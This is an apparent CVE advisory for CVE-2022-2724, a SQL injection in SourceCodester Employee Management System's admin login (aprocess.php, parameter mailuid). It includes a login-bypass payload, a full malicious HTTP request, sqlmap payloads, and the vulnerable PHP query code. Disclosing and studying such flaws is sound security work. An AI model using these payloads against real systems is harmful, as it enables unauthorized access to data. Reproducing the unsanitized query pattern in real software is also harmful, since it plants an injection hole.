Headline

CVE-2022-2724: PHP代码审计—Employee Management System aprocess.php SQL Injection

A vulnerability was found in SourceCodester Employee Management System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /process/aprocess.php. The manipulation of the argument mailuid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205837 was assigned to this vulnerability.

2 years ago

CVE

Open in Source

#sql #vulnerability #web #windows #apple #php #chrome #webkit

SourceCodester Employee Management System aprocess.php SQL Injection****Vendor Homepage:

https://www.sourcecodester.com/php/14432/employee-management-system-using-php.html

Source Code Download：

https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip

Proof of Concept

Step 1: Open the URL http://127.0.0.1/ems/alogin.html

Step 2: Use payload admin’ or 1 # in Email and anything in Password

Step 3: login success

Malicious Request.

POST /ems/process/aprocess.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 40
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.47
Referer: http://192.168.88.195/ems/alogin.html
Accept-Encoding: gzip, deflate
Connection: close

mailuid=admin' or 1 #&pwd=123&login-submit=Login

Sqlmap

Parameter: mailuid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: mailuid=-6002' OR 3766=3766#&pwd=123&login-submit=Login

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: mailuid=admin' AND (SELECT 4206 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(4206=4206,1))),0x7176786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sPJa&pwd=123&login-submit=Login

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: mailuid=admin' AND (SELECT 1085 FROM (SELECT(SLEEP(5)))gGqt)-- XrcV&pwd=123&login-submit=Login

code

/process/aprocess.php line 5-12，

$email = $_POST['mailuid'];
$password = $_POST['pwd'];

$sql = "SELECT * from `alogin` WHERE email = '$email' AND password = '$password'";

//echo "$sql";

$result = mysqli_query($conn, $sql);

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

11 months ago

11 months ago

11 months ago

11 months ago

11 months ago